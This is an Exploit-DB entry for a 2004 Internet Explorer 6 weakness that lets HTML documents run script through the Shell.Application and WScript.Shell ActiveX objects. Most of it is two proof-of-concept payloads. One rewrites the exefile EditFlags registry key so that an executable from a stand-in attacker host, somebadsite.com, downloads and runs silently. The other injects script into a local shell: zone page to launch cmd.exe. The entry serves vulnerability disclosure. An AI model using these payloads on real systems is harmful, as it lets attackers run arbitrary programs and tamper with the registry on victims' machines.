Microsoft Internet Explorer 6 - Shell.Application Object Script Execution

EDB-ID:

24249

CVE:

N/A

EDB Verified:

Author:

http-equiv

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2004-07-03

Vulnerable App: 
source: https://www.securityfocus.com/bid/10652/info

Microsoft Internet Explorer is reported prone to a security weakness that may permit malicious HTML documents the ability to execute script code. This script code has the ability to alter registry settings that may allow for further attacks. In conjunction with other vulnerabilities, execution of attacker-supplied binaries may also be possible.

In particular, it is reported possible to alter the registry to allow for previously patched vulnerabilities to be exploitable again.

Exploitation of this weakness typically requires other vulnerabilities to redirect the browser into the Local Zone (or other appropriate Security Zone). Other attack vectors also exist, such as enticing a user to download an HTML document to their system then opening it with the Web browser. HTML email may also provide an attack vector for this weakness (in combination with other vulnerabilities). Cross-site scripting and HTML injection vulnerabilities in Web applications may also provide a surreptitious attack vector in unsuspecting clients. 

"Matthew Murphy" <mattmurphy@kc.rr.com> proposed:
<html><head>
<script language="JavaScript" defer>
function throw_onload() {
actx.RegWrite("HKCR\\exefile\\EditFlags", 0x38070000, "REG_BINARY");
window.close();
}
var actx = new ActiveXObject("WScript.Shell");
actx.RegWrite("HKCR\\exefile\\EditFlags", 256, "REG_BINARY");
document.writeln("<IFRAME SRC=\"http://www.somebadsite.com/file.exe\"
ONLOAD=\"throw_onload()\" />");
window.setTimeout("throw_onload()", 5000); // Don't know for sure if IE
fires OnLoad for .exe files! Anyone?
</script></head><body></body></html>

"http-equiv@excite.com" <1@malware.com> presented:
<iframe src="shell:windows\web\tip.htm"
style="width:400px;height:200px;"></iframe>
<textarea id="code" style="display:none;">
injected.
<script language="JScript" DEFER>
alert('attempting injection');
var obj=new ActiveXObject("Shell.Application");
obj.ShellExecute("cmd.exe","/c pause");
</script>
&lt;/textarea&gt;
<script language="javascript">
function doit() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin',
document.all.code.value);
}
setTimeout("doit()", 2000);
</script>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services